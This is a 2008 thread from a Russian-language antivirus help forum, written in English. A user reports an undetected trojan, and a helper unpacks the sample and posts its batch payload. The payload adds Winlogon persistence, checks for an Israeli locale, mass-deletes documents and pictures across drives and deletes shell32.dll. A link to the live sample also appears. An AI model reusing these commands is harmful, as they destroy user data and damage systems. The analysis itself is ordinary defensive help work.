Показано с 1 по 6 из 6.

New Trojan / Not detectable by any antivirus/rookit/anti-spyware

  1. #1
    Junior Member Репутация
    Регистрация
    14.05.2008
    Сообщений
    3
    Вес репутации
    58

    Exclamation New Trojan / Not detectable by any antivirus/rookit/anti-spyware

    Hello everybody,

    I have discovered by chance a few processes running from a TMP file/VBS script.

    I copy and paste the VBS script. I do not know what this Trojan is doing, but when I deleted the files and rebooted, my keyboard and mouse didnt work! I have tried several antivirus, antiroot kits and anti spyware which didnt work.
    moderated::: file attached as VBS.txt
    Вложения Вложения
    • Тип файла: txt VBS.txt (74.0 Кб, 5 просмотров)
    Последний раз редактировалось Rene-gad; 15.05.2008 в 10:53.

  2. #2
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Muffler
    Регистрация
    03.05.2006
    Адрес
    U.S.
    Сообщений
    713
    Вес репутации
    850
    Hi,
    adis, can you send us a copy of this file?

    Looks like this is a part of Worm.Win32.AutoRun...
    Последний раз редактировалось Muffler; 14.05.2008 в 23:41.

  3. #3
    Junior Member Репутация
    Регистрация
    14.05.2008
    Сообщений
    3
    Вес репутации
    58
    I have put the vbs script and the explot.exe renamed in explot-root.exe here:

    http://www.speedyshare.com/521433131.html

  4. #4
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Muffler
    Регистрация
    03.05.2006
    Адрес
    U.S.
    Сообщений
    713
    Вес репутации
    850
    Explot-root.exe - malware.
    Packed with two packers: UPX and Morphine.
    Unpacked file contains .bat file which I think explains everything:

    Код:
    @echo off..title....reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %systemroot%\system32\userinit.exe,%systemroot%\system32\taskfile.exe /f....reg query "HKCU\Keyboard Layout\Preload" >>"%systemdrive%\svi\003988274\svss.lpd"..reg query "HKCU\Control Panel\International" >>"%systemdrive%\svi\003988274\svss.lpd"..find /I "0000040d" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit..find /I "Israel" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit....del /f /s C:\*.jpg C:\*.txt C:\*.doc C:\*.htm..del /f /s d:\*.jpgd:\*.txt d:\*.doc C:\*.htm..del/f /s e:\*.jpg e:\*.txt e:\*.doc C:\*.htm..del /f /s f:\*.jpg f:\*.txt f:\*.doc C:\*.htm..del /f /s g:\*.jpg g:\*.txt g:\*.doc C:\*.htm..del /f /s h:\*.jpg h:\*.txt h:\*.doc C:\*.htm..del /f /s I:\*.jpg I:\*.txt I:\*.doc C:\*.htm..del /f /s J:\*.jpg J:\*.txt J:\*.doc C:\*.htm....del /f %systemroot%\system32\shell32.dll..del /f %systemdrive%\svi*...

  5. #5
    Junior Member Репутация
    Регистрация
    14.05.2008
    Сообщений
    3
    Вес репутации
    58
    Thanks! Any idea how to cure this?

    It seems it was supposed to delete me all documents and pcitures on the system. And, at the end, it was deleting itself and shell32? Do you think shell32 and tasklist are infected as well?

    I have avast home edition running as antivirus on my system. It did not detect anything! Trying to cure with others didnt work either!

    cheers
    Adrian
    Последний раз редактировалось adis; 15.05.2008 в 10:42.

  6. #6
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    Цитата Сообщение от adis Посмотреть сообщение
    Thanks! Any idea how to cure this?
    pls. read the rules http://virusinfo.info/showthread.php?t=9184

Похожие темы

  1. Ответов: 10
    Последнее сообщение: 22.02.2009, 07:16
  2. Ответов: 6
    Последнее сообщение: 22.02.2009, 06:14
  3. Ответов: 9
    Последнее сообщение: 01.07.2008, 18:35
  4. eTrust Antivirus, PestPatrol Anti-Spyware теперь и в России.
    От Andrey в разделе Антивирусы
    Ответов: 1
    Последнее сообщение: 29.09.2005, 22:17

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01267 seconds with 20 queries